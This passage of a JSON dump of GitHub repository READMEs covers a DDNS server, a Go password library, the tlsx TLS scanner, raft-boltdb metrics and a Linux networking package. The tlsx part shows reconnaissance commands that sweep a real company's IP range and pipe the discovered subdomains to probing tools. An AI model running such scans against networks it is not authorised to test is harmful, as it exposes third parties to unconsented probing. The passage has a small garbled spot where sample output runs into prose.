dyndns options ssl=true\n\nThis also means that DDCLIENT works out of the box and Linux based devices should work.\n\nD-Link DIR-842:\n\nAnother router that has been tested is from the D-Link router line where you need to fill the \ndetails in on the Web Interface. The values are self-explanatory. Under the server (once you chosen Manual)\nyou need to enter you DDNS server's hostname or IP. The protocol used by the router will be the \ndyndns2 by default and cannot be changed.\n\n\n## Accessing the REST API log\n\nJust run\n\n```\ndocker logs -f dyndns\n```\n\n## DNS setup\n\nTo provide a little help... To your \"real\" domain, like `domain.tld`, you\nshould add a subdomain that is delegated to this DDNS server like this:\n\n```\ndyndns IN NS ns\nns IN A \nns IN AAAA \n```\n\nYour management API should then also be accessible through\n\n```\nhttp://ns.domain.tld:8080/update?...\n```\n\nIf you provide `foo` as a domain when using the REST API, the resulting domain\nwill then be `foo.dyndns.domain.tld`.\n\n## Common pitfalls\n\n* If you're on a systemd-based distribution, the process `systemd-resolved` might occupy the DNS port 53. Therefore starting the container might fail. To fix this disable the DNSStubListener by adding `DNSStubListener=no` to `/etc/systemd/resolved.conf` and restart the service using `sudo systemctl restart systemd-resolved.service` but be aware of the implications... Read more here: https://www.freedesktop.org/software/systemd/man/systemd-resolved.service.html and https://github.com/dprandzioch/docker-ddns/issues/5\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sethvargo/go-password", "link": "https://github.com/sethvargo/go-password", "tags": ["password", "password-generator", "golang"], "stars": 537, "description": "A Golang library for generating high-entropy random passwords similar to 1Password or LastPass.", "lang": "Go", "repo_lang": "", "readme": "## Golang Password Generator\n\n[![GoDoc](https://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://pkg.go.dev/github.com/sethvargo/go-password/password)\n[![GitHub Actions](https://img.shields.io/github/workflow/status/sethvargo/go-password/Test?style=flat-square)](https://github.com/sethvargo/go-password/actions?query=workflow%3ATest)\n\nThis library implements generation of random passwords with provided\nrequirements as described by [AgileBits\n1Password](https://discussions.agilebits.com/discussion/23842/how-random-are-the-generated-passwords)\nin pure Golang. The algorithm is commonly used when generating website\npasswords.\n\nThe library uses crypto/rand for added randomness.\n\nSample example passwords this library may generate:\n\n```text\n0N[k9PhDqmmfaO`p_XHjVv`HTq|zsH4XiH8umjg9JAGJ#\\Qm6lZ,28XF4{X?3sHj\n7@90|0H7!4p\\,c Since these are completely randomized, it's possible that they may generate passwords that don't comply with some custom password policies, such as ones that require both upper case AND lower case letters. If your particular use case needs a mix of casing, then you can either increase the number of characters in the password or check the output and regenerate if it fails a particular constraint, such as requiring both upper and lower case.\n\n## Installation\n\n```sh\n$ go get -u github.com/sethvargo/go-password/password\n```\n\n## Usage\n\n```golang\npackage main\n\nimport (\n \"log\"\n\n \"github.com/sethvargo/go-password/password\"\n)\n\nfunc main() {\n // Generate a password that is 64 characters long with 10 digits, 10 symbols,\n // allowing upper and lower case letters, disallowing repeat characters.\n res, err := password.Generate(64, 10, 10, false, false)\n if err != nil {\n log.Fatal(err)\n }\n log.Printf(res)\n}\n```\n\nSee the [GoDoc](https://godoc.org/github.com/sethvargo/go-password) for more\ninformation.\n\n## Testing\n\nFor testing purposes, instead of accepted a `*password.Generator` struct, accept\na `password.PasswordGenerator` interface:\n\n```go\n// func MyFunc(p *password.Generator)\nfunc MyFunc(p password.PasswordGenerator) {\n // ...\n}\n```\n\nThen, in tests, use a mocked password generator with stubbed data:\n\n```go\nfunc TestMyFunc(t *testing.T) {\n gen := password.NewMockGenerator(\"canned-response\", false)\n MyFunc(gen)\n}\n```\n\nIn this example, the mock generator will always return the value\n\"canned-response\", regardless of the provided parameters.\n\n## License\n\nThis code is licensed under the MIT license.\n", "readme_type": "markdown", "hn_comments": "You know, the first thing I thought when I saw this was that the author should use the EFF word list and not the original diceware list.Then I saw that the author was Seth Vargo, and that he had already done that.Nice.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "projectdiscovery/tlsx", "link": "https://github.com/projectdiscovery/tlsx", "tags": [], "stars": 537, "description": "Fast and configurable TLS grabber focused on TLS based data collection.", "lang": "Go", "repo_lang": "", "readme": "

\n\n
\n

\n\n\n

\n\n\n\n\n\n\n

\n\n

\n Features \u2022\n Installation \u2022\n Usage \u2022\n Running tlsx \u2022\n Join Discord\n

\n\n\nA fast and configurable TLS grabber focused on TLS based **data collection and analysis**.\n\n\n# Features\n\n![image](https://user-images.githubusercontent.com/8293321/174847743-0e229545-2431-4b4c-9029-878f218ad0bc.png)\n\n - Fast And fully configurable TLS Connection\n - Multiple **Modes for TLS Connection**\n - Multiple **TLS probes**\n - **Auto TLS Fallback** for older TLS version\n - **Pre Handshake** TLS connection (early termination)\n - Customizable **Cipher / SNI / TLS** selection\n - **JARM/JA3** TLS Fingerprint\n - **TLS Misconfigurations**\n - **ASN,CIDR,IP,HOST,** and **URL** input\n - STD **IN/OUT** and **TXT/JSON** output\n\n\n## Installation\n\ntlsx requires **Go 1.18** to install successfully. To install, just run the below command or download pre-compiled binary from [release page](https://github.com/projectdiscovery/tlsx/releases).\n\n```console\ngo install github.com/projectdiscovery/tlsx/cmd/tlsx@latest\n```\n\n## Usage\n\n```console\ntlsx -h\n```\n\nThis will display help for the tool. Here are all the switches it supports.\n\n```console\nTLSX is a tls data gathering and analysis toolkit.\n\nUsage:\n tlsx [flags]\n\nFlags:\nINPUT:\n -u, -host string[] target host to scan (-u INPUT1,INPUT2)\n -l, -list string target list to scan (-l INPUT_FILE)\n -p, -port string[] target port to connect (default 443)\n\nSCAN-MODE:\n -sm, -scan-mode string tls connection mode to use (ctls, ztls, openssl, auto) (default \"auto\")\n -ps, -pre-handshake enable pre-handshake tls connection (early termination) using ztls\n -sa, -scan-all-ips scan all ips for a host (default false)\n -iv, -ip-version string[] ip version to use (4, 6) (default 4)\n\nPROBES:\n -san display subject alternative names\n -cn display subject common names\n -so display subject organization name\n -tv, -tls-version display used tls version\n -cipher display used cipher\n -hash string display certificate fingerprint hashes (md5,sha1,sha256)\n -jarm display jarm fingerprint hash\n -ja3 display ja3 fingerprint hash (using ztls)\n -wc, -wildcard-cert display host with wildcard ssl certificate\n -tps, -probe-status display tls probe status\n -ve, -version-enum enumerate and display supported tls versions\n -ce, -cipher-enum enumerate and display supported cipher\n -ch, -client-hello include client hello in json output (ztls mode only)\n -sh, -server-hello include server hello in json output (ztls mode only)\n\nMISCONFIGURATIONS:\n -ex, -expired display host with host expired certificate\n -ss, -self-signed display host with self-signed certificate\n -mm, -mismatched display host with mismatched certificate\n -re, -revoked display host with revoked certificate\n\nCONFIGURATIONS:\n -config string path to the tlsx configuration file\n -r, -resolvers string[] list of resolvers to use\n -cc, -cacert string client certificate authority file\n -ci, -cipher-input string[] ciphers to use with tls connection\n -sni string[] tls sni hostname to use\n -rs, -random-sni use random sni when empty\n -min-version string minimum tls version to accept (ssl30,tls10,tls11,tls12,tls13)\n -max-version string maximum tls version to accept (ssl30,tls10,tls11,tls12,tls13)\n -ac, -all-ciphers send all ciphers as accepted inputs (default true)\n -cert, -certificate include certificates in json output (PEM format)\n -tc, -tls-chain include certificates chain in json output\n -vc, -verify-cert enable verification of server certificate\n -ob, -openssl-binary string OpenSSL Binary Path\n\nOPTIMIZATIONS:\n -c, -concurrency int number of concurrent threads to process (default 300)\n -timeout int tls connection timeout in seconds (default 5)\n -retry int number of retries to perform for failures (default 3)\n -delay string duration to wait between each connection per thread (eg: 200ms, 1s)\n\nOUTPUT:\n -o, -output string file to write output to\n -j, -json display json format output\n -ro, -resp-only display tls response only\n -silent display silent output\n -nc, -no-color disable colors in cli output\n -v, -verbose display verbose output\n -version display project version\n\nDEBUG:\n -health-check, -hc run diagnostic check up\n```\n\n## Using tlsx as library\n\nExamples of using tlsx as library are provided in the [examples](examples/) folder.\n\n## Running tlsx\n\n### Input for tlsx\n\n**tlsx** requires **ip** to make TLS connection and accept multiple format as listed below:\n\n```bash\nAS1449 # ASN input\n173.0.84.0/24 # CIDR input\n93.184.216.34 # IP input\nexample.com # DNS input\nexample.com:443 # DNS input with port\nhttps://example.com:443 # URL input port\n```\n\nInput host can be provided using `-host / -u` flag, and multiple values can be provided using comma-separated input, similarly **file** input is supported using `-list / -l` flag.\n\nExample of comma-separated host input: \n\n```console\n$ tlsx -u 93.184.216.34,example.com,example.com:443,https://example.com:443 -silent\n```\n\nExample of file based host input:\n\n```console\n$ tlsx -list host_list.txt\n```\n\n**Port Input:**\n\n**tlsx** connects on port **443** by default, which can be customized using `-port / -p` flag, single or multiple ports can be specified using comma sperated input or new line delimited file containing list of ports to connect. \n\n\nExample of comma-separated port input: \n\n```\n$ tlsx -u hackerone.com -p 443,8443\n```\n\nExample of file based port input: \n\n```\n$ tlsx -u hackerone.com -p port_list.txt\n```\n\n**Note:**\n\n> When input host contains port in it, for example, `8.8.8.8:443` or `hackerone.com:8443`, port specified with host will be used to make TLS connection instead of default or one provided using `-port / -p` flag.\n\n### TLS Probe (default run)\n\nThis will run the tool against the given CIDR range and returns hosts that accepts tls connection on port 443.\n\n```console\n$ echo 173.0.84.0/24 | tlsx \n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n173.0.84.69:443\n173.0.84.67:443\n173.0.84.68:443\n173.0.84.66:443\n173.0.84.76:443\n173.0.84.70:443\n173.0.84.72:443\n```\n\n### SAN/CN Probe\n\nTLS certificate contains DNS names under **subject alternative name** and **common name** field that can be extracted using `-san`, `-cn` flag.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent\n\n173.0.84.104:443 [uptycspay.paypal.com]\n173.0.84.104:443 [api-3t.paypal.com]\n173.0.84.104:443 [api-m.paypal.com]\n173.0.84.104:443 [payflowpro.paypal.com]\n173.0.84.104:443 [pointofsale-s.paypal.com]\n173.0.84.104:443 [svcs.paypal.com]\n173.0.84.104:443 [uptycsven.paypal.com]\n173.0.84.104:443 [api-aa.paypal.com]\n173.0.84.104:443 [pilot-payflowpro.paypal.com]\n173.0.84.104:443 [pointofsale.paypal.com]\n173.0.84.104:443 [uptycshon.paypal.com]\n173.0.84.104:443 [api.paypal.com]\n173.0.84.104:443 [adjvendor.paypal.com]\n173.0.84.104:443 [zootapi.paypal.com]\n173.0.84.104:443 [api-aa-3t.paypal.com]\n173.0.84.104:443 [uptycsize.paypal.com]\n```\n\nFor ease of automation, optionally `-resp-only` flag can be used to list only dns names in CLI output.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only\n\napi-aa-3t.paypal.com\npilot-payflowpro.paypal.com\npointofsale-s.paypal.com\nuptycshon.paypal.com\na.paypal.com\nadjvendor.paypal.com\nzootapi.paypal.com\napi-aa.paypal.com\npayflowpro.paypal.com\npointofsale.paypal.com\nuptycspay.paypal.com\napi-3t.paypal.com\nuptycsize.paypal.com\napi.paypal.com\napi-m.paypal.com\nsvcs.paypal.com\nuptycsven.paypal.com\nuptycsven.paypal.com\na.paypal.com\napi.paypal.com\npointofsale-s.paypal.com\npilot-payflowpro.paypal.com\n```\n\n**subdomains** obtained from TLS certificates can be further piped to other PD tools for further inspection, here is an example piping tls subdomains to **[dnsx](https://github.com/projectdiscovery/dnsx)** to filter passive subdomains and passing to **[httpx](https://github.com/projectdiscovery/httpx)** to list hosts running active web services.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only | dnsx -silent | httpx\n\n __ __ __ _ __\n / /_ / /_/ /_____ | |/ /\n / __ \\/ __/ __/ __ \\| /\n / / / / /_/ /_/ /_/ / |\n/_/ /_/\\__/\\__/ .___/_/|_|\n /_/ v1.2.2\n\n projectdiscovery.io\n\nUse with caution. You are responsible for your actions.\nDevelopers assume no liability and are not responsible for any misuse or damage.\nhttps://api-m.paypal.com\nhttps://uptycsize.paypal.com\nhttps://api.paypal.com\nhttps://uptycspay.paypal.com\nhttps://svcs.paypal.com\nhttps://adjvendor.paypal.com\nhttps://uptycshap.paypal.com\nhttps://uptycshon.paypal.com\nhttps://pilot-payflowpro.paypal.com\nhttps://slc-a-origin-pointofsale.paypal.com\nhttps://uptycsven.paypal.com\nhttps://api-aa.paypal.com\nhttps://api-aa-3t.paypal.com\nhttps://uptycsbrt.paypal.com\nhttps://payflowpro.paypal.com\nhttp://pointofsale-s.paypal.com\nhttp://slc-b-origin-pointofsale.paypal.com\nhttp://api-3t.paypal.com\nhttp://zootapi.paypal.com\nhttp://pointofsale.paypal.com\n````\n\n### TLS / Cipher Probe\n\n```console\n$ subfinder -d hackerone.com | tlsx -tls-version -cipher\n\nmta-sts.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nhackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\napi.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nmta-sts.managed.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nmta-sts.forwarding.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nwww.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nsupport.hackerone.com:443 [TLS1.2] [TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]\n```\n\n# TLS Misconfiguration\n\n### Expired / Self Signed / Mismatched / Revoked Certificate\n\nA list of host can be provided to tlsx to detect **expired / self-signed / mismatched / revoked** certificates.\n\n```console\n$ tlsx -l hosts.txt -expired -self-signed -mismatched -revoked\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\nwrong.host.badssl.com:443 [mismatched]\nself-signed.badssl.com:443 [self-signed]\nexpired.badssl.com:443 [expired]\nrevoked.badssl.com:443 [revoked]\n```\n\n### [JARM](https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a/) TLS Fingerprint\n\n```console\n$ echo hackerone.com | tlsx -jarm -silent\n\nhackerone.com:443 [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]\n```\n\n### [JA3](https://github.com/salesforce/ja3) TLS Fingerprint\n\n```console\n$ echo hackerone.com | tlsx -ja3 -silent\n\nhackerone.com:443 [20c9baf81bfe96ff89722899e75d0190]\n```\n\n### JSON Output\n\n**tlsx** does support multiple probe flags to query specific data, but all the information is always available in JSON format, for automation and post processing using `-json` output is most convenient option to use.\n\n```console\necho example.com | tlsx -json -silent | jq .\n```\n\n```json\n{\n \"timestamp\": \"2022-08-22T21:22:59.799053+05:30\",\n \"host\": \"example.com\",\n \"ip\": \"93.184.216.34\",\n \"port\": \"443\",\n \"probe_status\": true,\n \"tls_version\": \"tls13\",\n \"cipher\": \"TLS_AES_256_GCM_SHA384\",\n \"not_before\": \"2022-03-14T00:00:00Z\",\n \"not_after\": \"2023-03-14T23:59:59Z\",\n \"subject_dn\": \"CN=www.example.org, O=Internet\u00a0Corporation\u00a0for\u00a0Assigned\u00a0Names\u00a0and\u00a0Numbers, L=Los Angeles, ST=California, C=US\",\n \"subject_cn\": \"www.example.org\",\n \"subject_org\": [\n \"Internet\u00a0Corporation\u00a0for\u00a0Assigned\u00a0Names\u00a0and\u00a0Numbers\"\n ],\n \"subject_an\": [\n \"www.example.org\",\n \"example.net\",\n \"example.edu\",\n \"example.com\",\n \"example.org\",\n \"www.example.com\",\n \"www.example.edu\",\n \"www.example.net\"\n ],\n \"issuer_dn\": \"CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\",\n \"issuer_cn\": \"DigiCert TLS RSA SHA256 2020 CA1\",\n \"issuer_org\": [\n \"DigiCert Inc\"\n ],\n \"fingerprint_hash\": {\n \"md5\": \"c5208a47259d540a6e3404dddb85af91\",\n \"sha1\": \"df81dfa6b61eafdffffe1a250240db5d2e6cee25\",\n \"sha256\": \"7f2fe8d6b18e9a47839256cd97938daa70e8515750298ddba2f3f4b8440113fc\"\n },\n \"tls_connection\": \"ctls\",\n \"sni\": \"example.com\"\n}\n```\n\n## Configuration\n\n### Scan Mode\n\ntlsx provides multiple modes to make TLS Connection -\n\n- `auto` (automatic fallback to other modes upon failure) - **default**\n- `ctls` (**[crypto/tls](https://github.com/golang/go/blob/master/src/crypto/tls/tls.go)**)\n- `ztls` (**[zcrypto/tls](https://github.com/zmap/zcrypto)**)\n- `openssl` (**[openssl](https://github.com/openssl/openssl)**)\n\nSome pointers for the specific mode / library is highlighted in [linked discussions](https://github.com/projectdiscovery/tlsx/discussions/2), `auto` mode is supported to ensure the maximum coverage and scans for the hosts running older version of TLS by retrying the connection using `ztls` and `openssl` mode upon any connection error.\n\nAn example of using `ztls` mode to scan website using old / outdated TLS version.\n\n```console\n$ echo tls-v1-0.badssl.com | tlsx -port 1010 -sm ztls\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\ntls-v1-0.badssl.com:1010\n```\n\n### OpenSSL\n\nTo use the openssl connection mode, you will need to have openssl installed on your system. Most modern systems come with openssl pre-installed, but if it is not present on your system, you can install it manually. You can check if openssl is installed by running the command `openssl version`. If openssl is installed, this command will display the version number.\n\n\n\n
\n\n### Pre-Handshake (Early Termination)\n\n**tlsx** supports terminating SSL connection early which leads to faster scanning and less connection request (disconnecting after TLS `serverhello` and certificate data is gathered).\n\nFor more detail, please refer to [Hunting-Certificates-And-Servers](https://github.com/erbbysam/Hunting-Certificates-And-Servers/blob/master/Hunting%20Certificates%20%26%20Servers.pdf) by [@erbbysam](https://twitter.com/erbbysam)\n\nAn example of using `-pre-handshake` mode:\n\n```console\n$ tlsx -u example.com -pre-handshake \n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\nexample.com:443\n```\n\n> **Note**:\n\n> **pre-handshake** mode utilizes `ztls` (**zcrypto/tls**) which also means the support is limited till `TLS v1.2` as `TLS v1.3` is not supported by `ztls` library.\n\n
\n\n\n\n### TLS Version\n\n**Minimum** and **Maximum** TLS versions can be specified using `-min-version` and `-max-version` flags, as default these value are set by underlying used library.\n\nThe acceptable values for TLS version is specified below.\n\n- `ssl30`\n- `tls10`\n- `tls11`\n- `tls12`\n- `tls13`\n\nHere is an example using `max-version` to scan for hosts supporting an older version of TLS, i.e **TLS v1.0**\n\n```console\n$ tlsx -u example.com -max-version tls10\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\nexample.com:443\n```\n\n### Custom Cipher\n\nSupported custom cipher can provided using `-cipher-input / -ci` flag, supported cipher list for each mode is available at [wiki page](https://github.com/projectdiscovery/tlsx/wiki/Ciphers).\n\n```console\n$ tlsx -u example.com -ci TLS_AES_256_GCM_SHA384 -cipher\n```\n\n```console\n$ tlsx -u example.com -ci cipher_list.txt -cipher\n```\n\n## Acknowledgements\n\nThis program optionally uses:\n\n- [zcrypto](https://github.com/zmap/zcrypto) library from the zmap team.\n- [cfssl](https://github.com/cloudflare/cfssl) library from the cloudflare team\n\n--------\n\n
\n\ntlsx is made with \u2764\ufe0f by the [projectdiscovery](https://projectdiscovery.io) team and distributed under [MIT License](LICENSE).\n\n\n\"Join\n\n
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/raft-boltdb", "link": "https://github.com/hashicorp/raft-boltdb", "tags": [], "stars": 537, "description": "Raft backend implementation using BoltDB", "lang": "Go", "repo_lang": "", "readme": "raft-boltdb\n===========\n\nThis repository provides the `raftboltdb` package. The package exports the\n`BoltStore` which is an implementation of both a `LogStore` and `StableStore`.\n\nIt is meant to be used as a backend for the `raft` [package\nhere](https://github.com/hashicorp/raft).\n\nThis implementation uses [BoltDB](https://github.com/boltdb/bolt). BoltDB is\na simple key/value store implemented in pure Go, and inspired by LMDB.\n\n## Metrics\n\nThe raft-boldb library emits a number of metrics utilizing github.com/armon/go-metrics. Those metrics are detailed in the following table. One note is that the application which pulls in this library may add its own prefix to the metric names. For example within [Consul](https://github.com/hashicorp/consul), the metrics will be prefixed with `consul.`.\n\n| Metric | Unit | Type | Description |\n| ----------------------------------- | ------------:| -------:|:--------------------- |\n| `raft.boltdb.freelistBytes` | bytes | gauge | Represents the number of bytes necessary to encode the freelist metadata. When [`raft_boltdb.NoFreelistSync`](/docs/agent/options#NoFreelistSync) is set to `false` these metadata bytes must also be written to disk for each committed log. |\n| `raft.boltdb.freePageBytes` | bytes | gauge | Represents the number of bytes of free space within the raft.db file. |\n| `raft.boltdb.getLog` | ms | timer | Measures the amount of time spent reading logs from the db. |\n| `raft.boltdb.logBatchSize` | bytes | sample | Measures the total size in bytes of logs being written to the db in a single batch. |\n| `raft.boltdb.logsPerBatch` | logs | sample | Measures the number of logs being written per batch to the db. |\n| `raft.boltdb.logSize` | bytes | sample | Measures the size of logs being written to the db. |\n| `raft.boltdb.numFreePages` | pages | gauge | Represents the number of free pages within the raft.db file. |\n| `raft.boltdb.numPendingPages` | pages | gauge | Represents the number of pending pages within the raft.db that will soon become free. |\n| `raft.boltdb.openReadTxn` | transactions | gauge | Represents the number of open read transactions against the db |\n| `raft.boltdb.storeLogs` | ms | timer | Measures the amount of time spent writing logs to the db. |\n| `raft.boltdb.totalReadTxn` | transactions | gauge | Represents the total number of started read transactions against the db |\n| `raft.boltdb.txstats.cursorCount` | cursors | counter | Counts the number of cursors created since Consul was started. |\n| `raft.boltdb.txstats.nodeCount` | allocations | counter | Counts the number of node allocations within the db since Consul was started. |\n| `raft.boltdb.txstats.nodeDeref` | dereferences | counter | Counts the number of node dereferences in the db since Consul was started. |\n| `raft.boltdb.txstats.pageAlloc` | bytes | gauge | Represents the number of bytes allocated within the db since Consul was started. Note that this does not take into account space having been freed and reused. In that case, the value of this metric will still increase. |\n| `raft.boltdb.txstats.pageCount` | pages | gauge | Represents the number of pages allocated since Consul was started. Note that this does not take into account space having been freed and reused. In that case, the value of this metric will still increase. |\n| `raft.boltdb.txstats.rebalance` | rebalances | counter | Counts the number of node rebalances performed in the db since Consul was started. |\n| `raft.boltdb.txstats.rebalanceTime` | ms | timer | Measures the time spent rebalancing nodes in the db. |\n| `raft.boltdb.txstats.spill` | spills | counter | Counts the number of nodes spilled in the db since Consul was started. |\n| `raft.boltdb.txstats.spillTime` | ms | timer | Measures the time spent spilling nodes in the db. |\n| `raft.boltdb.txstats.split` | splits | counter | Counts the number of nodes split in the db since Consul was started. |\n| `raft.boltdb.txstats.write` | writes | counter | Counts the number of writes to the db since Consul was started. |\n| `raft.boltdb.txstats.writeTime` | ms | timer | Measures the amount of time spent performing writes to the db. |\n| `raft.boltdb.writeCapacity` | logs/second | sample | Theoretical write capacity in terms of the number of logs that can be written per second. Each sample outputs what the capacity would be if future batched log write operations were similar to this one. This similarity encompasses 4 things: batch size, byte size, disk performance and boltdb performance. While none of these will be static and its highly likely individual samples of this metric will vary, aggregating this metric over a larger time window should provide a decent picture into how this BoltDB store can perform |\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "milosgajdos/tenus", "link": "https://github.com/milosgajdos/tenus", "tags": ["docker", "networking", "linux", "netlink"], "stars": 537, "description": "Linux networking in Go", "lang": "Go", "repo_lang": "", "readme": "# Linux networking in Golang\n\n[![GoDoc](https://godoc.org/github.com/milosgajdos/tenus?status.svg)](https://godoc.org/github.com/milosgajdos/tenus)\n[![License](https://img.shields.io/:license-apache-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n**tenus** is a [Golang](http://golang.org/) package which allows you to configure and manage Linux network devices programmatically. It communicates with Linux Kernel via [netlink](http://man7.org/linux/man-pages/man7/netlink.7.html) to facilitate creation and configuration of network devices on the Linux host. The package also allows for more advanced network setups with Linux containers including [Docker](https://github.com/dotcloud/docker/).\n\n**tenus** uses [runc](https://github.com/opencontainers/runc)'s implementation of **netlink** protocol. The package only works with newer Linux Kernels (3.10+) which are shipping reasonably new `netlink` protocol implementation, so **if you are running older kernel this package won't be of much use to you** I'm afraid. I have developed this package on Ubuntu [Trusty Tahr](http://releases.ubuntu.com/14.04/) which ships with 3.13+ and verified its functionality on [Precise Pangolin](http://releases.ubuntu.com/12.04/) with upgraded kernel to version 3.10. I could worked around the `netlink` issues by using `ioctl` syscalls, but I decided to prefer \"pure netlink\" implementation, so suck it old Kernels.\n\nAt the moment only functional tests are available, but the interface design should hopefully allow for easy (ish) unit testing in the future. I do appreciate that the package's **test coverage is not great at the moment**, but the core functionality should be covered. I would massively welcome PRs.\n\n## Get started\n\nThere is a ```Vagrantfile``` available in the repo so using [vagrant](https://github.com/mitchellh/vagrant) is the easiest way to get started:\n\n```bash\nmilosgajdos@bimbonet ~ $ git clone https://github.com/milosgajdos/tenus.git\nmilosgajdos@bimbonet ~ $ vagrant up\n\n```\n\n**Note** using the provided ```Vagrantfile``` will take quite a long time to spin the VM as vagrant will setup Ubuntu Trusty VM with all the prerequisities:\n\n* it will install golang and docker onto the VM\n* it will export ```GOPATH``` and ```go get``` the **tenus** package onto the VM\n* it will also \"**pull**\" Docker ubuntu image so that you can run the tests once the VM is set up\n\nAt the moment running the tests require Docker to be installed, but in the future I'd love to separate tests per interface so that you can run only chosen test sets.\n\nOnce the VM is running, ```cd``` into particular repo directory and you can run the tests:\n\n```bash\nmilosgajdos@bimbonet ~ $ cd $GOPATH/src/github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ sudo go test\n```\n\nIf you don't want to use the provided ```Vagrantfile```, you can simply run your own Linux VM (with 3.10+ kernel) and follow the regular golang development flow:\n\n```bash\nmilosgajdos@bimbonet ~ $ go get github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ cd $GOPATH/src/github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ sudo go test\n```\n\nOnce you've got the package and ran the tests (you don't need to run the tests!), you can start hacking. Below you can find simple code samples to get started with the package.\n\n## Examples\n\nBelow you can find a few code snippets which can help you get started writing your own programs.\n\n### New network bridge, add dummy link into it\n\nThe example below shows a simple program example which creates a new network bridge, a new dummy network link and adds it into the bridge.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// Create a new network bridge\n\tbr, err := tenus.NewBridgeWithName(\"mybridge\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Bring the bridge up\n\tif err = br.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// Create a dummy link\n\tdl, err := tenus.NewLink(\"mydummylink\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Add the dummy link into bridge\n\tif err = br.AddSlaveIfc(dl.NetInterface()); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Bring the dummy link up\n\tif err = dl.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n}\n```\n\n### New network bridge, veth pair, one peer in Docker\n\nThe example below shows how you can create a new network bride, configure its IP address, add a new veth pair and send one of the veth peers into Docker with a given name.\n\n**!! You must make sure that particular Docker is runnig if you want the code sample below to work properly !!** So before you compile and run the program below you should create a particular docker with the below used name:\n\n```bash\nmilosgajdos@bimbonet ~ $ docker run -i -t --rm --privileged -h vethdckr --name vethdckr ubuntu:14.04 /bin/bash\n```\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// CREATE BRIDGE AND BRING IT UP\n\tbr, err := tenus.NewBridgeWithName(\"vethbridge\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tbrIp, brIpNet, err := net.ParseCIDR(\"10.0.41.1/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := br.SetLinkIp(brIp, brIpNet); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif err = br.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// CREATE VETH PAIR\n\tveth, err := tenus.NewVethPairWithOptions(\"myveth01\", tenus.VethOptions{PeerName: \"myveth02\"})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// ASSIGN IP ADDRESS TO THE HOST VETH INTERFACE\n\tvethHostIp, vethHostIpNet, err := net.ParseCIDR(\"10.0.41.2/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := veth.SetLinkIp(vethHostIp, vethHostIpNet); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// ADD MYVETH01 INTERFACE TO THE MYBRIDGE BRIDGE\n\tmyveth01, err := net.InterfaceByName(\"myveth01\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err = br.AddSlaveIfc(myveth01); err != nil 